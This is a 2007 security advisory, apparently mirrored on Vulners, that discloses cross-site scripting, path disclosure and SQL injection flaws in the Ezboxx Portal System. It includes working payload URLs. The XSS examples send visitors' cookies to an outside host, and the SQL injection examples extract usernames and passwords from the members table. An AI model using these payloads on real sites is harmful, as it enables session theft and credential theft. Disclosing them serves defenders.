Vulners
Lucene search
ezboxxezroot.txt
`Ezboxx multiple vulnerabilities.
Vulnerable version:
Ezboxx Portal System Beta v 0.7.6 and below.
The Ezboxx Portal System Beta v 0.7.6 and below versions are vulnerable to Cross-site scripting, Path disclosure and SQL Injection attacks.
Cross-site scripting:
----------------------
Description:
Input passed to the parameters "pic" (in "piczoom.asp"), "nocatname" (in "user-upload.asp") and "iid" (in "newscomments.asp")
are not properly verified before being returned to the user as HTML code.
Therefore an attacker may use one of the Cross-site scripting to execute arbitrary script code in the browser of the site's users.
Proof-of-concept:
http://[Host]/ezboxx/custom/piczoom.asp?pic=[XSS]
http://[Host]/ezboxx/boxx/user-upload.asp?nocatname=[XSS] - Login required
http://[Host]//ezboxx/indexes/newscomments.asp?iid=[XSS]
Examples:
http://[Host]/ezboxx/custom/piczoom.asp?pic=BugSec'+onerror='window.open("http://www.BugSec.com/Index.php?Security_Consulting_Company=Penetration-Testing&Cookie="+document.cookie)
http://[Host]/ezboxx/boxx/user-upload.asp?nocatname='><script>location.href='http://www.BugSec.com/Index.php?Info-Sec=Pen_Test&Cookie='+document.cookie</script>
http://[Host]/ezboxx/indexes/newscomments.asp?iid=200/*<script>location.href='http://www.BugSec.com/Index.php?Information-Security=Application_Security&Cookie='+document.cookie</script>*/
Path disclosure:
------------------
Description:
Path information can be disclosed in error pages by passing invalid input to the parameter "cat" in "knowledgebase.asp".
Proof-of-concept:
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=notnumber
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=1&Cat=notnumber
Examples:
http://[Host]/ezboxx/boxx/knowledgebase.asp?iid=549&Cat=exam
http://[Host]/ezboxx/boxx/knowledgebase.asp?Type=1&Cat=exam
SQL Injection:
-------------------
Description:
Input passed to the "iid" parameter in "ShowAppendix.asp" isn't properly verified before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
An attacker may use this vulnerability to extract any info (like account's passwords) from the database.
Proof-of-concept:
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=[SQL]
Example:
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+username+from+members))
http://[Host]/ezboxx/boxx/ShowAppendix.asp?iid=convert(int,(select+TOP+1+password+from+members))
Credit:
Doron P and Eyal G from BugSec
Tel:+97239622655
Fax:+97239619351
Email:Info [^A-t] BugSec \*D.O.T*\ com
BugSec LTD. - www.BugSec.com
Security Consulting Company
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
14 Jan 2007 00:00Current
7.4High risk
Vulners AI Score7.4